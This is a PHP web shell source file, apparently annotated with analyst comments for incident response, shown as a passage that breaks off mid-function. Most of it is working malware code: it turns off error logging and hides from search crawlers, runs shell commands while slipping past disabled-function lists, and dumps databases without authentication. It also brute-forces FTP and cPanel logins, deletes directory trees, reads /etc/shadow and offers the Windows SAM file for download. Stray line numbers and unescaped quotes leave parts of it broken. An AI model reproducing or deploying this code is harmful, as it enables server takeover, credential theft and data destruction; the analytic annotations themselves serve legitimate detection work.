1<?php
2//========================================//
3//========+++Dhanush+++==========//
4//========================================//
5
// Set Username & Password
// NOTE(analysis): both values are identical 32-character hex strings, the
// format of an MD5 digest. Only $pass is consulted by the cookie check that
// appears further down the file. Unsalted MD5 is a weak way to store a secret;
// the strings are most useful as indicators for matching this sample.
$user = "21232f297a57a5a743894a0e4a801fc3";
$pass = "21232f297a57a5a743894a0e4a801fc3";

// Hard-coded external host. Nothing in the lines visible here reads $malsite;
// it remains a network indicator when triaging a host that carried this file.
$malsite = "http://fightagent.ru"; // Malware Site

// Read later by the file-listing code, which offers a "Deface IT" link on
// index files whenever this string is non-empty.
$ind = "WW91IGp1c3QgZ290IGhhY2tlZCAhISEhIQ=="; // "Deface Page" Base64 encoded "You Just Got Hacked !!"

// Anti-forensics: the calls below reduce what the PHP runtime records about
// this script. The error log target is cleared, error logging and reporting
// are switched off, and execution time limits are lifted. Web-server access
// logs and file-integrity monitoring remain the dependable evidence sources.
// set_magic_quotes_runtime() was removed in PHP 7.0, which points to a sample
// written for legacy PHP runtimes.
@set_magic_quotes_runtime(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
ob_start();
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);

// Crawler cloaking: a request whose User-Agent matches one of the listed
// search-engine or archive bot names (case-insensitive) gets a bare 404 and
// the script stops. A scanner announcing itself with one of these names sees
// the same 404, so presence of the file should be confirmed on disk rather
// than by an HTTP probe.
if(!empty($_SERVER['HTTP_USER_AGENT']))
{
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit; }
}
// Dump Database
// NOTE(analysis): this branch sits above the `hacked` cookie check that appears
// later in the file, so that check does not cover it. It connects to a MySQL
// server using the host and credentials carried in request cookies, writes
// every table of the database named in ?dbname= to a file in the current
// working directory, and streams that file back as a download. The file is
// never deleted here: during incident response look for
// "Dump-<dbname>-<YYYY-MM-DD>.sql" next to the script and treat the dumped
// data as exposed. The mysql_* API used throughout was removed in PHP 7.0.
if($_GET["action"] == "dumpDB")
{
    $self=$_SERVER["PHP_SELF"];
    // Proceeds only when the request carries a `dbserver` cookie.
    if(isset($_COOKIE['dbserver']))
    {
        $date = date("Y-m-d");
        // Connection target, credentials and database name all come from the request.
        $dbserver = $_COOKIE["dbserver"];
        $dbuser = $_COOKIE["dbuser"];
        $dbpass = $_COOKIE["dbpass"];
        $dbname = $_GET['dbname'];
        $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);

        $file = "Dump-$dbname-$date";

        // Final output name; the request-supplied $dbname is embedded unmodified.
        $file="Dump-$dbname-$date.sql";
        $fp = fopen($file,"w");

        // Appends $data to the dump file through the global handle $fp.
        function write($data)
        {
            global $fp;

            fwrite($fp,$data);

        }
        mysql_connect ($dbserver, $dbuser, $dbpass);
        mysql_select_db($dbname);
        $tables = mysql_query ("SHOW TABLES");
        // For each table: write its CREATE TABLE statement, then one INSERT per row
        // with every column value quoted and escaped.
        while ($i = mysql_fetch_array($tables))
        {
            $i = $i['Tables_in_'.$dbname];
            $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
            write($create['Create Table'].";");
            $sql = mysql_query ("SELECT * FROM ".$i);
            if (mysql_num_rows($sql)) {
                while ($row = mysql_fetch_row($sql)) {
                    foreach ($row as $j => $k) {
                        $row[$j] = "'".mysql_escape_string($k)."'";
                    }
                    write("INSERT INTO $i VALUES(".implode(",", $row).");");
                }
            }
        }

        fclose ($fp);

        // Serve the finished file as an attachment, read back in 64 KiB chunks.
        header("Content-Disposition: attachment; filename=" . $file);
        header("Content-Type: application/download");
        header("Content-Length: " . filesize($file));
        flush();

        $fp = fopen($file, "r");
        while (!feof($fp))
        {
            echo fread($fp, 65536);
            flush();
        }
        fclose($fp);
    }
}
// Emits the inline stylesheet for the panel's pages (black background,
// red/green text). Presentation only; the selector names (input.but,
// input.sbox, .myphp, font.mainmenu) are literal strings that can help match
// this panel's rendered output in captured responses.
function shellstyle()
{
    echo "<style type=\"text/css\">
<!--

body,td,th {
 color: #FF0000;
 font-size: 14px;
}
input.but {
 background-color:#000000;
 color:#FF0000;
 border : 1px solid #1B1B1B;
}
a:link {
 color: #00FF00;
 text-decoration:none;
 font-weight:500;
}
a:hover {
 color:#00FF00;
 text-decoration:underline;
}
font.txt
{
 color: #00FF00;
 text-decoration:none;
 font-size:14px;
}
font.mainmenu
{
 color:#FF0000;
 text-decoration:none;
 font-size:14px;
}
a:visited {
 color: #006600;
}
input.box
{
 background-color:#0C0C0C;
 color: lime;
 border : 1px solid #1B1B1B;
 -moz-border-radius:6px;
 width:400;
 border-radius:6px;
}
input.sbox
{
 background-color:#0C0C0C;
 color: lime;
 border : 1px solid #1B1B1B;
 -moz-border-radius:6px;
 width:180;
 border-radius:6px;
}
select.sbox
{
 background-color:#0C0C0C;
 color: lime;
 border : 1px solid #1B1B1B;
 -moz-border-radius:6px;
 width:180;
 border-radius:6px;
}
select.box
{
 background-color:#0C0C0C;
 color: lime;
 border : 1px solid #1B1B1B;
 -moz-border-radius:6px;
 width:400;
 border-radius:6px;
}

textarea.box
{
 border : 3px solid #111;
 background-color:#161616;
 color : lime;
 margin-top: 10px;
 -moz-border-radius:7px;
 border-radius:7px;
}
body {
 background-color:#000000;
}
.myphp table
{
 width:100%;
 padding:18px 10px;
 border : 1px solid #1B1B1B;
}
.myphp td
{
 background:#111111;
 color:#00ff00;
 padding:6px 8px;
 border-bottom:1px solid #222222;
 font-size:14px;
}
.myphp th, th
{
 background:#181818;

}
-->
</style>";
}
199if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
200{
// Session setup. These statements sit inside the branch guarded by the
// `hacked` cookie comparison on the preceding lines, so they run only for a
// request that passed that check. The cookie name is a fixed string and is
// visible in request headers and proxy logs.
$self=$_SERVER["PHP_SELF"];
$os = "N/D";
$bdmessage = null;
$dir = getcwd();

// Platform detection from php_uname(). $SEPARATOR is assigned only on Windows,
// and $directorysperator stays unset when the host reports neither name.
if(stristr(php_uname(),"Windows"))
{
    $SEPARATOR = '\\';
    $os = "Windows";
    $directorysperator="\\";
}
else if(stristr(php_uname(),"Linux"))
{
    $os = "Linux";
    $directorysperator='/';
}
// Splits $d on $directsperator, drops the last two components and joins the
// rest again. The file listing uses it to turn "<dir>/.." into the parent path.
// implode() is called with the array first, the legacy argument order.
function Trail($d,$directsperator)
{
    $d=explode($directsperator,$d);
    array_pop($d);
    array_pop($d);
    $str=implode($d,$directsperator);
    return $str;
}
225
// Makes one authenticated cURL request to ftp://$host with $user:$pass and
// prints a "Cracking Success" line when cURL reports no error; a connect
// timeout (cURL error 28) prints an error and ends the request.
// NOTE(analysis): this is the single-attempt primitive of a credential-guessing
// feature; the caller is not visible here. On a host that ran this panel,
// repeated outbound FTP logins from the web-server account are the matching
// network trace. As captured on this page the success string contains an
// unescaped double quote, so the listing may not parse as shown.
function ftp_check($host,$user,$pass,$timeout)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "ftp://$host");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
    curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
    curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_FAILONERROR, 1);
    $data = curl_exec($ch);
    if ( curl_errno($ch) == 28 )
    {
        print "<center><b>
 Error : Connection Timeout.
 Please Check The Target Hostname .</b></center>";exit;
    }
    else if ( curl_errno($ch) == 0 )
    {
        print "<center><b>[~]</b><font class=txt>
 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
    }
    curl_close($ch);
}
251
// HTTP counterpart of ftp_check(): one Basic-auth request to
// http://$host:<global $cpanel_port> with $user:$pass. No cURL error prints a
// "Cracking Success" line; a connect timeout (cURL error 28) prints an error
// and ends the request.
// NOTE(analysis): the matching trace is a run of failed Basic-auth requests
// against the control-panel port originating from the web server itself. As
// captured on this page the success string contains an unescaped double quote.
function cpanel_check($host,$user,$pass,$timeout)
{
    global $cpanel_port;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
    curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_FAILONERROR, 1);
    $data = curl_exec($ch);
    if ( curl_errno($ch) == 28 )
    { print "<center><b>Error : Connection Timeout.
 Please Check The Target Hostname.</b></center>";exit;}
    else if ( curl_errno($ch) == 0 ){
        print "<ecnter><b>[~]</b><font class=txt><b>

 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
    }
    curl_close($ch);
}
274
275 // Database functions
// Renders the database browser's top level: a "Create Database" form followed
// by a table with one row per database on the server named in the `dbserver`
// cookie, each with its table count and Tables / Drop / Dump links.
// NOTE(analysis): the MySQL host and credentials are read from cookies on
// every call, so they appear in clear text in any captured request headers.
// Database names are written into HTML and inline JavaScript without escaping.
function listdatabase()
{
    $self=$_SERVER["PHP_SELF"];
    ?>
 <br>
 <form>
 <table>
 <tr>
 <td><input type="text" class="box" name="dbname"></td>
 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
 </tr>
 </table>
 </form>
 <br>
 <?php
    $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
    // This result is overwritten inside the loop below before it is ever read.
    $result = mysql_query("SHOW DATABASE");
    echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";

    $pDB = mysql_list_dbs( $mysqlHandle );
    $num = mysql_num_rows( $pDB );
    for( $i = 0; $i < $num; $i++ )
    {
        $dbname = mysql_dbname( $pDB, $i );
        mysql_select_db($dbname,$mysqlHandle);
        $result = mysql_query("SHOW TABLES");
        $num_of_tables = mysql_num_rows($result);
        echo "<tr>\n";
        echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
        echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
        echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
        // The Dump link targets the ?action=dumpDB handler near the top of the file.
        echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
        echo "</tr>\n";
    }
    echo "</table>\n";
    mysql_close($mysqlHandle);
}
313
// Renders the table browser for the database named in ?dbname=: a
// "Create Table" form, a free-form "Execute Query" box, and one row per table
// with its row count and Schema / Data / Empty / Drop links.
// NOTE(analysis): connection details come from cookies, and the request's
// dbname / tablename values are echoed into HTML attributes and inline
// JavaScript without escaping. Each table's row count is obtained by running
// "select * from <table>" against it, which shows up as a full scan of every
// table in database query logs.
function listtable()
{
    $self=$_SERVER["PHP_SELF"];
    $dbserver = $_COOKIE["dbserver"];
    $dbuser = $_COOKIE["dbuser"];
    $dbpass = $_COOKIE["dbpass"];
    $dbname = $_GET['dbname'];
    echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
    ?>
 <br><br>
 <form>
 <table>

 <tr>
 <td><input type="text" class="box" name="tablename"></td>
 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
 </tr>
 </table>

 <br>
 <form>
 <table>
 <tr>
 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
 </tr>
 <tr>
 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
 </tr>
 </table>
 </form>

 <?php

    $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);

    mysql_select_db($dbname);
    $pTable = mysql_list_tables( $dbname );

    // A falsy result from mysql_list_tables() is reported with the MySQL error text.
    if( $pTable == 0 ) {
        $msg = mysql_error();
        echo "<h3>Error : $msg</h3><p>\n";
        return;
    }
    $num = mysql_num_rows( $pTable );

    echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";

    for( $i = 0; $i < $num; $i++ )
    {
        $tablename = mysql_tablename( $pTable, $i );
        // Full-table select used only to obtain the row count shown next to the name.
        $result = mysql_query("select * from $tablename");
        $num_rows = mysql_num_rows($result);
        echo "<tr>\n";
        echo "<td>\n";
        echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
        echo "</td>\n";
        echo "</tr>\n";
    }

    echo "</table></form>";
    mysql_close($mysqlHandle);
    echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
}
389
390
// Prints a "label: value" pair. Nothing is printed when the trimmed value is
// empty; single-line values go inline, multi-line values into a <pre> block.
// Neither $n nor $v is HTML-escaped before output.
function paramexe($n, $v)
{
    $v = trim($v);
    if($v)
    {
        echo '<span><font size=3>' . $n . ': </font></span>';
        if(strpos($v, "\n") === false)
            echo '<font size=2>' . $v . '</font><br>';
        else
            echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
    }
}
403
404
405
// Recursively deletes $dir and everything beneath it; does nothing when $dir
// is not a directory. Return values of unlink()/rmdir() are not checked.
// NOTE(analysis): this backs the panel's delete action, so sudden loss of whole
// directory trees owned by the web-server account is consistent with its use.
function rrmdir($dir)
{
    if (is_dir($dir)) // ensures that we actually have a directory
    {
        $objects = scandir($dir); // gets all files and folders inside
        foreach ($objects as $object)
        {
            if ($object != '.' && $object != '..')
            {
                if (is_dir($dir . '/' . $object))
                {
                    // if we find a directory, do a recursive call
                    rrmdir($dir . '/' . $object);
                }
                else
                {
                    // if we find a file, simply delete it
                    unlink($dir . '/' . $object);
                }
            }
        }
        // the original directory is now empty, so delete it
        rmdir($dir);
    }
}
431
// Resolves a program name by running the shell command "which <name>" through
// execmd(); returns the trimmed result, or the trimmed input when the result
// is empty. $pr is concatenated into the command line without quoting.
function which($pr)
{
    $path = execmd("which $pr");
    if(!empty($path))
        return trim($path);
    else
        return trim($pr);
}
440
// Returns $text unchanged when magic quotes are off, otherwise with the
// slashes added by magic quotes removed again.
function magicboom($text)
{
    if (!get_magic_quotes_gpc())
        return $text;
    return stripslashes($text);
}
447
// Runs the shell command $cmd and returns what the chosen PHP function gives
// back, or -1 when no branch produced a result.
//   $cmd         command line, passed to the shell as-is
//   $d_functions comma-separated function names in the format of PHP's
//                disable_functions setting; the default "None" short-circuits
//                to passthru()
// The candidate list is walked in order and the first name not present in
// $d_functions is used.
// NOTE(analysis): this is the panel's command-execution core. Hardening that
// blocks only some of the six functions leaves the remaining ones available to
// it; the observable effect on a host is shell child processes started by the
// web server / PHP worker account. Every call is prefixed with @, so failures
// produce no PHP warnings.
function execmd($cmd,$d_functions="None")
{
    if($d_functions=="None")
    {
        $ret=passthru($cmd);
        return $ret;
    }
    $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
    $d_functions=str_replace(" ","",$d_functions);
    $dis_funcs=explode(",",$d_functions);
    foreach($funcs as $safe)
    {
        if(!in_array($safe,$dis_funcs))
        {
            if($safe=="exec")
            {
                $ret=@exec($cmd);
                $ret=join("\n",$ret);
                return $ret;
            }
            elseif($safe=="system")
            {
                $ret=@system($cmd);
                return $ret;
            }
            elseif($safe=="passthru")
            {
                $ret=@passthru($cmd);
                return $ret;
            }
            elseif($safe=="shell_exec")
            {
                $ret=@shell_exec($cmd);
                return $ret;
            }
            elseif($safe=="popen")
            {
                // Read the command's output line by line from the pipe.
                $ret=@popen("$cmd",'r');
                if(is_resource($ret))
                {
                    while(@!feof($ret))
                        $read.=@fgets($ret);
                    @pclose($ret);
                    return $read;
                }
                return -1;
            }
            elseif($safe="proc_open")
            {
                // stdin/stdout pipes for the child; only stdout is read.
                $cmdpipe=array(
                    0=>array('pipe','r'),
                    1=>array('pipe','w')
                );
                $resource=@proc_open($cmd,$cmdpipe,$pipes);
                if(@is_resource($resource))
                {
                    while(@!feof($pipes[1]))
                        $ret.=@fgets($pipes[1]);
                    @fclose($pipes[1]);
                    @proc_close($resource);
                    return $ret;
                }
                return -1;
            }
        }
    }
    return -1;
}
516
// Returns the server's disable_functions setting, or the literal string "None"
// when it is empty. The result has the format execmd() accepts as its second
// argument.
function getDisabledFunctions()
{
    if(!ini_get('disable_functions'))
    {
        return "None";
    }
    else
    {
        return @ini_get('disable_functions');
    }
}
528
// Builds the ten-character "ls -l" style permission string for $file
// (for example "-rw-r--r--") from the mode returned by fileperms().
function getFilePermissions($file)
{
    $mode = fileperms($file);

    // File-type masks in the order they are tested: the first mask whose bits
    // are all set in the mode decides the leading character.
    $typeMasks = array(
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => '-', // regular file
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    );
    $out = 'u'; // unknown type unless one of the masks matches
    foreach ($typeMasks as $mask => $symbol) {
        if (($mode & $mask) == $mask) {
            $out = $symbol;
            break;
        }
    }

    // One row per permission class: read bit, write bit, execute bit, special
    // bit, then the letter shown for the special bit with and without execute.
    $classes = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner, setuid
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group, setgid
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world, sticky
    );
    foreach ($classes as $row) {
        list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $row;
        $out .= ($mode & $readBit) ? 'r' : '-';
        $out .= ($mode & $writeBit) ? 'w' : '-';
        if ($mode & $execBit) {
            $out .= ($mode & $specialBit) ? $withExec : 'x';
        } else {
            $out .= ($mode & $specialBit) ? $withoutExec : '-';
        }
    }

    return $out;
}
// Wraps the permission string of $filename in a colored <font> tag:
// red when the file is not readable, white when readable but not writable,
// green when both readable and writable by the PHP process.
function filepermscolor($filename)
{
    if(!@is_readable($filename))
        return "<font color=\"#FF0000\">".getFilePermissions($filename)."</font>";
    else if(!@is_writable($filename))
        return "<font color=\"#FFFFFF\">".getFilePermissions($filename)."</font>";
    else
        return "<font color=\"#00FF00\">".getFilePermissions($filename)."</font>";
}
591
// Prints the requesting client's address as reported in REMOTE_ADDR.
function yourip()
{
    echo $_SERVER["REMOTE_ADDR"];
}
// Prints the running PHP version.
function phpver()
{
    $pv=@phpversion();
    echo $pv;
}
// Prints an ON/OFF badge for the magic_quotes_gpc setting.
function magic_quote()
{
    echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
}
// Prints the server's address taken from the SERVER_ADDR environment variable.
function serverip()
{
    echo getenv('SERVER_ADDR');
}
// Prints the port the request arrived on (SERVER_PORT).
function serverport()
{
    echo $_SERVER['SERVER_PORT'];
}
// Returns a status string derived from the global $sm, which is set outside
// the lines visible here (presumably the safe_mode flag; confirm at the
// assignment).
function safe()
{
    global $sm;
    return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
}
// Prints the configured server administrator contact (SERVER_ADMIN).
function serveradmin()
{
    echo $_SERVER['SERVER_ADMIN'];
}
// Prints the operating system description returned by php_uname().
function systeminfo()
{
    echo php_uname();
}
// Prints an Enabled/Disabled badge depending on whether the cURL extension's
// curl_version() function exists.
function curlinfo()
{
    echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
}
// Prints an Enabled/Disabled badge for Oracle support, tested via ocilogon().
function oracleinfo()
{
    echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
}
// Prints an Enabled/Disabled badge for the legacy mysql extension, tested via
// mysql_connect().
function mysqlinfo()
{
    echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
}
// Prints an Enabled/Disabled badge for MSSQL support, tested via mssql_connect().
function mssqlinfo()
{
    echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
}
// Prints an Enabled/Disabled badge for PostgreSQL support, tested via pg_connect().
function postgresqlinfo()
{
    echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
}
// Prints the web server's software banner (SERVER_SOFTWARE).
function softwareinfo()
{
    echo getenv("SERVER_SOFTWARE");
}
// Sends a file to the client as an attachment and ends the request.
// The ?download= value is split on "/" and only the final segment is kept;
// that segment is used both as the file to read (relative to the current
// working directory) and as the attachment file name.
// NOTE(analysis): in access logs this appears as GET requests carrying a
// `download=` query parameter with a filesystem path, answered with
// application/octet-stream.
function download()
{
    $frd=$_GET['download'];
    $prd=explode("/",$frd);
    // After the loop $nfd holds the last path segment.
    for($i=0;$i<sizeof($prd);$i++)
    {
        $nfd=$prd[$i];
    }
    @ob_clean();
    header("Content-type: application/octet-stream");
    header("Content-length: ".filesize($nfd));
    header("Content-disposition: attachment; filename=\"".$nfd."\";");
    readfile($nfd);

    exit;

}
667
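// Formats a byte count as a short human-readable string such as "1.5 KB".
//   $size  number of bytes
// Returns the value rounded to two decimals followed by a unit from B to PB.
// A value of exactly 1024 of a unit rolls over to the next unit ("1 KB", not
// "1024 B"), and values beyond the largest unit stay expressed in PB instead
// of indexing past the end of the unit list.
function HumanReadableFilesize($size)
{
    $mod = 1024;
    $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB');
    $last = count($units) - 1;
    $i = 0;
    while ($size >= $mod && $i < $last)
    {
        $size /= $mod;
        $i++;
    }
    return round($size, 2) . ' ' . $units[$i];
}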
678
// Windows only: probes drive letters A: through Z: with is_dir() and prints a
// navigation link for each one that exists.
function showDrives()
{
    global $self;
    foreach(range('A','Z') as $drive)
    {
        if(is_dir($drive.':\\'))
        {
            $myd = $drive.":\\";
            ?>
 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
 <?php echo $myd; ?>
 </a>
 <?php
        }
    }
}
// Returns the total size, in bytes, of the filesystem containing "/".
function diskSpace()
{
    return disk_total_space("/");
}
// Returns the free space, in bytes, on the filesystem containing "/".
function freeSpace()
{
    return disk_free_space("/");
}
703
// Returns the output of the shell command "which <name>" run through myexe(),
// or false when that output is empty. Used as an "is this program installed"
// test by the reconnaissance report.
function thiscmd($p)
{
    $path = myexe('which ' . $p);
    if(!empty($path))
        return $path;
    return false;
}
711
// Prints the panel's host-reconnaissance report.
// On Linux it reads distribution, kernel, CPU, memory, mount, ulimit and hosts
// information, reports whether /etc/passwd and /etc/shadow are readable, and
// tests with `which` for compilers and interpreters, download tools, and a
// list of security products. On other systems it links to the Windows SAM
// repair copy and network config files and runs `ver`, `net accounts` and
// `net user`.
// NOTE(analysis): a single page view therefore produces a dense burst of
// `which`, `whereis` and `cat` child processes (or `net` commands on Windows)
// under the web-server account, which is a strong process-telemetry signal.
// The nested myparam() is declared when this function first runs; a second
// call in the same request would redeclare it.
function mysecinfo()
{
    // Same output helper as paramexe(), with fixed red/lime colors; values are
    // printed without HTML escaping.
    function myparam($n, $v)
    {
        $v = trim($v);
        if($v)
        {
            echo '<span><font color =red size=3>' . $n . ': </font></span>';
            if(strpos($v, "\n") === false)
                echo '<font color =lime size=3>' . $v . '</font><br>';
            else
                echo '<pre class=ml1><font color =lime size=3>' . $v . '</font></pre>';
        }
    }

    myparam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
    myparam('Open base dir', @ini_get('open_basedir'));
    myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    // Database client libraries compiled into this PHP build.
    $temp=array();
    if(function_exists('mysql_get_client_info'))
        $temp[] = "MySql (".mysql_get_client_info().")";
    if(function_exists('mssql_connect'))
        $temp[] = "MSSQL";
    if(function_exists('pg_connect'))
        $temp[] = "PostgreSQL";
    if(function_exists('oci_connect'))
        $temp[] = "Oracle";
    myparam('Supported databases', implode(', ', $temp));
    echo '<br>';

    if($GLOBALS['os'] == 'Linux') {
        myparam('Distro : ', myexe("cat /etc/*-release"));
        myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
        myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
        myparam('OS version', @file_get_contents('/proc/version'));
        myparam('Distr name', @file_get_contents('/etc/issue.net'));
        myparam('Where is Perl?', myexe('whereis perl'));
        myparam('Where is Python?', myexe('whereis python'));
        myparam('Where is gcc?', myexe('whereis gcc'));
        myparam('Where is apache?', myexe('whereis apache'));
        myparam('CPU?', myexe('cat /proc/cpuinfo'));
        myparam('RAM', myexe('free -m'));
        myparam('Mount options', myexe('cat /etc/fstab'));
        myparam('User Limits', myexe('ulimit -a'));


        if(!$GLOBALS['safe_mode']) {
            // Build tools and interpreters present on the host.
            $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
            // Antivirus, rootkit-scanner, IDS, firewall and log-monitoring
            // program names; the report lists which of them are installed.
            $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
            // Programs able to fetch files over the network.
            $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
            echo '<br>';
            $temp=array();
            foreach ($userful as $item)
                if(thiscmd($item))
                    $temp[] = $item;
            myparam('Userful', implode(', ',$temp));
            $temp=array();
            foreach ($danger as $item)
                if(thiscmd($item))
                    $temp[] = $item;
            myparam('Danger', implode(', ',$temp));
            $temp=array();
            foreach ($downloaders as $item)
                if(thiscmd($item))
                    $temp[] = $item;
            myparam('Downloaders', implode(', ',$temp));
            echo '<br/>';
            myparam('HDD space', myexe('df -h'));
            myparam('Hosts', @file_get_contents('/etc/hosts'));

        }
    } else {
        // Windows paths are built from the WINDIR server variable.
        $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
        $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
        $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
        $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
        echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
        echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
        $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
        echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
        myparam('OS Version',myexe('ver'));
        myparam('Account Settings',myexe('net accounts'));
        myparam('User Accounts',myexe('net user'));
    }
    echo '</div>';
}
801
802
803
// Runs the shell command $in and returns its captured output as a string.
// The first available mechanism is used, in this order: exec(), passthru(),
// system(), shell_exec(), popen(). Returns '' when none of them applies.
// NOTE(analysis): used by the reconnaissance report and thiscmd(); every use
// starts a shell child process under the web-server account. The calls that
// can emit warnings are prefixed with @.
function myexe($in)
{
    $out = '';
    if (function_exists('exec')) {
        @exec($in,$out);
        $out = @join("\n",$out);
    } elseif (function_exists('passthru')) {
        // passthru() writes straight to output, so it is captured in a buffer.
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    } elseif (function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
